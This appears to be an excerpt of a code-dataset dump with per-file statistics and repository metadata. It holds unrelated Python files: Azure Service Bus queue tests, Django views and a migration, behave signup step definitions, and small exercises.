            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        with queue_client.get_sender() as sender:
            content = str(uuid.uuid4())
            message_id = uuid.uuid4()
            message = Message(content)
            message.time_to_live = timedelta(seconds=30)
            sender.send(message)

        time.sleep(30)
        with queue_client.get_receiver() as receiver:
            messages = receiver.fetch_next(timeout=10)
        assert not messages

        with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
            count = 0
            for message in receiver:
                print_message(message)
                message.complete()
                count += 1
            assert count == 1

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_duplicate_detection=True, dead_lettering_on_message_expiration=True)
    def test_queue_message_duplicate_detection(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        message_id = uuid.uuid4()
        queue_client = client.get_queue(servicebus_queue.name)
        with queue_client.get_sender() as sender:
            for i in range(5):
                message = Message(str(i))
                message.properties.message_id = message_id
                sender.send(message)

        with queue_client.get_receiver(idle_timeout=5) as receiver:
            count = 0
            for message in receiver:
                print_message(message)
                assert message.properties.message_id == message_id
                message.complete()
                count += 1
            assert count == 1

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_message_connection_closed(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        with queue_client.get_sender() as sender:
            content = str(uuid.uuid4())
            message = Message(content)
            sender.send(message)

        with queue_client.get_receiver() as receiver:
            messages = receiver.fetch_next(timeout=10)
            assert len(messages) == 1

        with pytest.raises(MessageSettleFailed):
            messages[0].complete()

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_message_expiry(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        with queue_client.get_sender() as sender:
            content = str(uuid.uuid4())
            message = Message(content)
            sender.send(message)

        with queue_client.get_receiver() as receiver:
            messages = receiver.fetch_next(timeout=10)
            assert len(messages) == 1
            time.sleep(30)
            assert messages[0].expired
            with pytest.raises(MessageLockExpired):
                messages[0].complete()
            with pytest.raises(MessageLockExpired):
                messages[0].renew_lock()

        with queue_client.get_receiver() as receiver:
            messages = receiver.fetch_next(timeout=30)
            assert len(messages) == 1
            print_message(messages[0])
            assert messages[0].header.delivery_count > 0
            messages[0].complete()

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_message_lock_renew(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        with queue_client.get_sender() as sender:
            content = str(uuid.uuid4())
            message = Message(content)
            sender.send(message)

        with queue_client.get_receiver() as receiver:
            messages = receiver.fetch_next(timeout=10)
            assert len(messages) == 1
            time.sleep(15)
            messages[0].renew_lock()
            time.sleep(15)
            messages[0].renew_lock()
            time.sleep(15)
            assert not messages[0].expired
            messages[0].complete()

        with queue_client.get_receiver() as receiver:
            messages = receiver.fetch_next(timeout=10)
            assert len(messages) == 0

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_message_receive_and_delete(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        with queue_client.get_sender() as sender:
            message = Message("Receive and delete test")
            sender.send(message)

        with queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete) as receiver:
            messages = receiver.fetch_next(timeout=10)
            assert len(messages) == 1
            received = messages[0]
            print_message(received)
            with pytest.raises(MessageAlreadySettled):
                received.complete()
            with pytest.raises(MessageAlreadySettled):
                received.abandon()
            with pytest.raises(MessageAlreadySettled):
                received.defer()
            with pytest.raises(MessageAlreadySettled):
                received.dead_letter()
            with pytest.raises(MessageAlreadySettled):
                received.renew_lock()

        time.sleep(30)
        with queue_client.get_receiver() as receiver:
            messages = receiver.fetch_next(timeout=10)
            for m in messages:
                print_message(m)
            assert len(messages) == 0

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_message_batch(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)

        def message_content():
            for i in range(5):
                yield "Message no. {}".format(i)

        with queue_client.get_sender() as sender:
            message = BatchMessage(message_content())
            sender.send(message)

        with queue_client.get_receiver() as receiver:
            messages = receiver.fetch_next(timeout=10)
            recv = True
            while recv:
                recv = receiver.fetch_next(timeout=10)
                messages.extend(recv)

            assert len(messages) == 5
            for m in messages:
                print_message(m)
                m.complete()

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_schedule_message(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
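        # Schedule delivery two minutes out; microseconds are dropped so the round-tripped
        # enqueue time compares equal below.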
        enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
        with queue_client.get_receiver() as receiver:
            with queue_client.get_sender() as sender:
                content = str(uuid.uuid4())
                message_id = uuid.uuid4()
                message = Message(content)
                message.properties.message_id = message_id
                message.schedule(enqueue_time)
                sender.send(message)

            messages = receiver.fetch_next(timeout=120)
            if messages:
                try:
                    data = str(messages[0])
                    assert data == content
                    assert messages[0].properties.message_id == message_id
                    assert messages[0].scheduled_enqueue_time == enqueue_time
                    assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
                    assert len(messages) == 1
                finally:
                    for m in messages:
                        m.complete()
            else:
                raise Exception("Failed to receive scheduled message.")

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_schedule_multiple_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
        with queue_client.get_receiver(prefetch=20) as receiver:
            with queue_client.get_sender() as sender:
                content = str(uuid.uuid4())
                message_id_a = uuid.uuid4()
                message_a = Message(content)
                message_a.properties.message_id = message_id_a
                message_id_b = uuid.uuid4()
                message_b = Message(content)
                message_b.properties.message_id = message_id_b
                tokens = sender.schedule(enqueue_time, message_a, message_b)
                assert len(tokens) == 2

            messages = receiver.fetch_next(timeout=120)
            messages.extend(receiver.fetch_next(timeout=5))
            if messages:
                try:
                    data = str(messages[0])
                    assert data == content
                    assert messages[0].properties.message_id in (message_id_a, message_id_b)
                    assert messages[0].scheduled_enqueue_time == enqueue_time
                    assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
                    assert len(messages) == 2
                finally:
                    for m in messages:
                        m.complete()
            else:
                raise Exception("Failed to receive scheduled message.")

    @pytest.mark.liveTest
    @pytest.mark.live_test_only
    @RandomNameResourceGroupPreparer(name_prefix='servicebustest')
    @ServiceBusNamespacePreparer(name_prefix='servicebustest')
    @ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
    def test_queue_cancel_scheduled_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
        client = ServiceBusClient(
            service_namespace=servicebus_namespace.name,
            shared_access_key_name=servicebus_namespace_key_name,
            shared_access_key_value=servicebus_namespace_primary_key,
            debug=False)

        queue_client = client.get_queue(servicebus_queue.name)
        enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
        with queue_client.get_receiver() as receiver:
            with queue_client.get_sender() as sender:
                message_a = Message("Test scheduled message")
                message_b = Message("Test scheduled message")
                tokens = sender.schedule(enqueue_time, message_a, message_b)
                assert len(tokens) == 2
                sender.cancel_scheduled_messages(*tokens)

            messages = receiver.fetch_next(timeout=120)
            try:
                assert len(messages) == 0
            except AssertionError:
                for m in messages:
                    print(str(m))
                    m.complete()
                raise
| 45.569255 | 218 | 0.665419 | 5,754 | 56,916 | 6.28554 | 0.061175 | 0.089308 | 0.064368 | 0.031852 | 0.851052 | 0.823375 | 0.80897 | 0.793818 | 0.77767 | 0.766915 | 0 | 0.0083 | 0.25701 | 56,916 | 1,249 | 219 | 45.569255 | 0.846954 | 0.01576 | 0 | 0.785784 | 0 | 0 | 0.044708 | 0.000464 | 0 | 0 | 0 | 0 | 0.098345 | 1 | 0.036027 | false | 0.000974 | 0.012658 | 0 | 0.050633 | 0.030185 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e5f296df789b51bee9041afcb8974301ae19afa2 | 95 | py | Python | CA117/Lab_3/palindrome_21.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 6 | 2016-02-04T00:15:20.000Z | 2019-10-13T13:53:16.000Z | CA117/Lab_3/palindrome_21.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 2 | 2016-03-14T04:01:36.000Z | 2019-10-16T12:45:34.000Z | CA117/Lab_3/palindrome_21.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 10 | 2016-02-09T14:38:32.000Z | 2021-05-25T08:16:26.000Z | (lambda s:print(s==s[::-1]))(__import__('re').sub(r"\W","",__import__('sys').argv[1].lower()))
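# Prints True if sys.argv[1] is a palindrome, after lowercasing it and stripping non-word characters.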
| 47.5 | 94 | 0.578947 | 16 | 95 | 2.9375 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021505 | 0.021053 | 95 | 1 | 95 | 95 | 0.483871 | 0 | 0 | 0 | 0 | 0 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
006e22c7ee269af2d54d7080b95059d1a81c61c5 | 236 | py | Python | rain/rain/views.py | akbernamazi/Safer_Cities | e1043d3e04ae38ad7395f441e0bb6ba5b87d8291 | [
"MIT"
] | null | null | null | rain/rain/views.py | akbernamazi/Safer_Cities | e1043d3e04ae38ad7395f441e0bb6ba5b87d8291 | [
"MIT"
] | null | null | null | rain/rain/views.py | akbernamazi/Safer_Cities | e1043d3e04ae38ad7395f441e0bb6ba5b87d8291 | [
"MIT"
] | null | null | null | from django.shortcuts import redirect
from django.shortcuts import render,HttpResponse,redirect
def login_redirect(request):
return redirect('account/validate')
def about(request):
return render(request,'accounts/about.html') | 29.5 | 58 | 0.79661 | 29 | 236 | 6.448276 | 0.551724 | 0.106952 | 0.203209 | 0.26738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110169 | 236 | 8 | 59 | 29.5 | 0.890476 | 0 | 0 | 0 | 0 | 0 | 0.147679 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
00980eca0aeb5c0f9a29b89fd321df6a9cc2b121 | 7,475 | py | Python | features/steps/signUp.py | FarmingdaleTUTR/nectr | 39b6e2b65bc9d9b1877f1b7c31258b2558fff371 | [
"MIT"
] | 1 | 2017-05-07T11:40:22.000Z | 2017-05-07T11:40:22.000Z | features/steps/signUp.py | FarmingdaleTUTR/nectr | 39b6e2b65bc9d9b1877f1b7c31258b2558fff371 | [
"MIT"
] | 83 | 2017-03-17T15:00:02.000Z | 2017-05-08T02:59:32.000Z | features/steps/signUp.py | FarmingdaleTUTR/nectr | 39b6e2b65bc9d9b1877f1b7c31258b2558fff371 | [
"MIT"
] | 2 | 2017-04-04T22:54:16.000Z | 2017-05-07T05:51:38.000Z | from behave import *
from hamcrest import *
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from nectr.users.models import User
from nectr.users.tests.factories import UserFactory
use_step_matcher("parse")
@given("{name} is not yet registered")
def step_impl(context, name):
"""
:param name: name of user
:type context: behave.runner.Context
"""
UserFactory(username=name)
assert_that(User.objects.all(), )
@given("Charlie is on the homepage")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("Charlie clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step('is asked "{text}"')
def step_impl(context, text):
"""
:type context: behave.runner.Context
"""
assert False
@step("he says no")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("Mike is on the homepage")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("mike clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step("he says yes")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@then('he is redirected to the "sign up form"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("Enoc is on the seacrch the hive page")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("enoc clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@then('is redirected to the "sign up" form')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("brandon is on the about nectr page")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("brandon clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("juan is on the how it works page")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("juan clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("Spongebob is on home page of nectr")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.get(context.server_url + "/")
@step("Spongebob does not have nectR account")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
pass
@when("Spongebob clicks menu")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_name("menu").click()
@step('Spongebob clicks "Sign Up" button')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('sign-up-link').click()
@step('title of the page is "Signup"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
WebDriverWait(context.driver, 10).until(
EC.title_contains("Signup"))
current_page_title = context.driver.title
assert_that(current_page_title, contains_string("Signup"))
@step('page contains an h1 whos text is "Sign up"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_tag_name('h1')
@when("Spongebob clicks on username text field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('id_username').click()
@step('Spongebob enters username "{some_text}"')
def step_impl(context, some_text):
"""
:type some_text: str
:type context: behave.runner.Context
"""
element = context.driver.find_element_by_id("id_username")
element.send_keys(some_text)
@step("Spongebob clicks on E-mail text field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('id_email').click()
@step("Spongebob clicks on password1 text field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('id_password1').click()
@step('Spongbob enters password1 "some_text"')
def step_impl(context, some_text):
"""
:type context: behave.runner.Context
"""
element = context.driver.find_element_by_id("id_password1")
element.send_keys(some_text)
@step("Spongbob leaves this text field blank")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('id_password2').clear()
@step('title of the page is "Verify Your E-mail Address"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step('page contains an h1 whos text is "Verify Your E-mail Address"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when('Spongebob checks his email "ayouf@farmingdale.edu"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step('Spongebob opens "confirm account" email')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step("Spongebob clicks account confirmation link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False

@step('Spongebob enters email "{some_text}"')
def step_impl(context, some_text):
    """
    :type some_text: str
    :type context: behave.runner.Context
    """
    element = context.driver.find_element_by_id("id_email")
    element.send_keys(some_text)


@step("Spongebob clicks on Repeat Password field")
def step_impl(context):
    """
    :type context: behave.runner.Context
    """
    context.driver.find_element_by_id("id_password2").click()


@then('Spongebob gets "please fill out this field" alert in Password field')
def step_impl(context):
    """
    :type context: behave.runner.Context
    """
    assert False


@step("Spongebob cicks on Password field")
def step_impl(context):
    """
    :type context: behave.runner.Context
    """
    assert False


@step('Spongbob enters password1 "{some_text}"')
def step_impl(context, some_text):
    """
    :type context: behave.runner.Context
    """
    element = context.driver.find_element_by_id("id_password1")
    element.send_keys(some_text)


@step("Spongebob cicks on repeat Password field")
def step_impl(context):
    """
    :type context: behave.runner.Context
    """
    context.driver.find_element_by_id("id_password2").click()


@step('Spongbob enters "CrabbyPatty2"')
def step_impl(context):
    """
    :type context: behave.runner.Context
    """
    pass


@step('Spongebob enters "BikiniBottoms"')
def step_impl(context):
    """
    :type context: behave.runner.Context
    """
    pass


@step("Spongebob clicks on password text field")
def step_impl(context):
    """
    :type context: behave.runner.Context
    """
    pass
| 20.3125 | 76 | 0.667559 | 962 | 7,475 | 5.060291 | 0.14553 | 0.060394 | 0.094906 | 0.1553 | 0.753698 | 0.743016 | 0.734388 | 0.732539 | 0.714256 | 0.68673 | 0 | 0.002505 | 0.199064 | 7,475 | 367 | 77 | 20.367847 | 0.81059 | 0.216856 | 0 | 0.521127 | 0 | 0 | 0.307043 | 0.004414 | 0 | 0 | 0 | 0 | 0.169014 | 1 | 0.295775 | false | 0.126761 | 0.049296 | 0 | 0.34507 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
00e596517348806e59ad398839c517eddb40f8af | 160 | py | Python | src/python/zquantum/core/bitstring_distribution/distance_measures/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 24 | 2020-04-15T17:36:59.000Z | 2022-01-25T05:02:14.000Z | src/python/zquantum/core/bitstring_distribution/distance_measures/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 177 | 2020-04-23T15:19:59.000Z | 2022-03-30T18:06:17.000Z | src/python/zquantum/core/bitstring_distribution/distance_measures/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 19 | 2020-06-24T10:56:02.000Z | 2021-09-30T13:02:21.000Z | from .clipped_negative_log_likelihood import compute_clipped_negative_log_likelihood
from .mmd import compute_mmd, compute_multi_rbf_kernel, compute_rbf_kernel
| 53.333333 | 84 | 0.9125 | 23 | 160 | 5.782609 | 0.478261 | 0.225564 | 0.270677 | 0.421053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 160 | 2 | 85 | 80 | 0.886667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
daccc70213d30b044866b8ad1e7e4943af47ccd4 | 132 | py | Python | 1. First-Steps-in-Coding/Exercises/Solutions/triagle.py | nakov/Python-Course-SoftUni | b6036064c259adbdae4e2d87b67230b9cf9ddefc | [
"MIT"
] | 6 | 2017-06-09T17:45:28.000Z | 2020-03-31T11:59:39.000Z | 1. First-Steps-in-Coding/Exercises/Solutions/triagle.py | nakov/Python-Course-SoftUni | b6036064c259adbdae4e2d87b67230b9cf9ddefc | [
"MIT"
] | null | null | null | 1. First-Steps-in-Coding/Exercises/Solutions/triagle.py | nakov/Python-Course-SoftUni | b6036064c259adbdae4e2d87b67230b9cf9ddefc | [
"MIT"
] | 1 | 2019-07-02T11:26:00.000Z | 2019-07-02T11:26:00.000Z | print ("*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n**********")
# for i in range (1, 10):
# print ("*" * i)
| 26.4 | 83 | 0.257576 | 18 | 132 | 1.888889 | 0.444444 | 0.470588 | 0.617647 | 0.705882 | 0.264706 | 0.264706 | 0.264706 | 0.264706 | 0 | 0 | 0 | 0.026316 | 0.136364 | 132 | 4 | 84 | 33 | 0.27193 | 0.318182 | 0 | 0 | 0 | 0 | 0.83908 | 0.83908 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
dad7ec862eebe9a4279472023d06b2ccfa7b2bc9 | 261 | py | Python | drift.py | janmtl/drift_qec | 3b1c703d151f9dc2833b761f85586cd09666557b | [
"0BSD"
] | null | null | null | drift.py | janmtl/drift_qec | 3b1c703d151f9dc2833b761f85586cd09666557b | [
"0BSD"
] | null | null | null | drift.py | janmtl/drift_qec | 3b1c703d151f9dc2833b761f85586cd09666557b | [
"0BSD"
] | null | null | null | from drift_qec.simulation import simulate_rates
# simulate_rates(error_rates=[0.2, 0.1], num_trials=2)
# simulate_rates(error_rates=[0.01, 0.005, 0.002, 0.001, 0.0005, 0.0002, 0.0001], num_trials=10)
simulate_rates(error_rates=[0.0002, 0.0001], num_trials=10)
| 43.5 | 96 | 0.754789 | 50 | 261 | 3.72 | 0.42 | 0.27957 | 0.290323 | 0.370968 | 0.607527 | 0.225806 | 0.225806 | 0 | 0 | 0 | 0 | 0.204167 | 0.08046 | 261 | 5 | 97 | 52.2 | 0.570833 | 0.563218 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
dafddbe94800555073ebd47ddb7902a544194142 | 66 | py | Python | preston/esi/__init__.py | feabell/Preston | e40e2c2ca82a232f2ca36a098921caae9561161c | [
"MIT"
] | null | null | null | preston/esi/__init__.py | feabell/Preston | e40e2c2ca82a232f2ca36a098921caae9561161c | [
"MIT"
] | null | null | null | preston/esi/__init__.py | feabell/Preston | e40e2c2ca82a232f2ca36a098921caae9561161c | [
"MIT"
] | null | null | null | from preston.esi.preston import *
from preston.esi.cache import *
| 22 | 33 | 0.787879 | 10 | 66 | 5.2 | 0.5 | 0.423077 | 0.538462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 66 | 2 | 34 | 33 | 0.896552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9702c5af5525858c6638061366b8fd4b5931bdf3 | 6,531 | py | Python | wab/core/custom_column/migrations/0001_initial.py | BinNguyenVNN/wab-rest | daab9e176b5aae60cf822a19563f2e4bc1e02ca1 | [
"MIT"
] | null | null | null | wab/core/custom_column/migrations/0001_initial.py | BinNguyenVNN/wab-rest | daab9e176b5aae60cf822a19563f2e4bc1e02ca1 | [
"MIT"
] | 1 | 2020-12-17T13:51:12.000Z | 2020-12-17T13:51:12.000Z | wab/core/custom_column/migrations/0001_initial.py | BinNguyenVNN/wab-rest | daab9e176b5aae60cf822a19563f2e4bc1e02ca1 | [
"MIT"
] | 1 | 2021-05-18T12:30:53.000Z | 2021-05-18T12:30:53.000Z | # Generated by Django 3.0.11 on 2020-12-17 13:49
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='ValidationType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('time_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Created on')),
                ('time_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last modified on')),
                ('name', models.CharField(blank=True, max_length=255, null=True)),
                ('is_regex', models.BooleanField(default=False)),
                ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                              related_name='custom_column_validationtype_creator',
                                              to=settings.AUTH_USER_MODEL, verbose_name='Created by')),
                ('last_modified_by',
                 models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                   related_name='custom_column_validationtype_last_modified',
